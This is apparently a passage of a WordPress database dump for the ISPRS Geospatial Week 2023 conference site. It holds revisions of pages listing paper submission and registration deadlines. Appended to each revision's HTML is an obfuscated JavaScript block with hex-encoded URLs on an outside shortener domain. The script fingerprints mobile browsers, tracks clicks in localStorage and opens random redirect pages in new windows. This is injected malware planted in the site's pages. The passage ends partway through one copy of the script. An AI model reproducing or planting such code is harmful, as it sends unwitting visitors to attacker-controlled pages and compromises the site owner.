_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-04 07:25:42','2023-02-04 07:25:42','',2631,'https://gsw2023.com/?p=3771',0,'revision','',0),
(3772,1,'2023-02-04 07:29:23','2023-02-04 07:29:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color:gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper Author notification: May 1, 2023</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Camera ready paper submission: June 1, 2023</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts Author notification: May 15, 2023</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Camera ready paper submission: June 1, 2023</span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\"><strong>Early bird registration deadline: May 1, 2023</strong></span></li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><strong>Late registration deadline: July 1, 2023</strong></span></li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-02-04 07:29:23','2023-02-04 07:29:23','',2654,'https://gsw2023.com/?p=3772',0,'revision','',0),
(3773,1,'2023-02-04 07:31:27','2023-02-04 07:31:27','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper Author notification: May 1, 2023</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Camera ready paper submission: June 1, 2023</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts Author notification: May 15, 2023</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Camera ready paper submission: June 1, 2023</span></strong></li>\n</ul>\n<p><a href=\"https://www.conftool.com/gsw2023/\"><strong>Submit Your Abstract/Paper Now</strong></a></p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\"><strong>Early bird registration deadline: May 1, 2023</strong></span></li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><strong>Late registration deadline: July 1, 2023</strong></span></li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 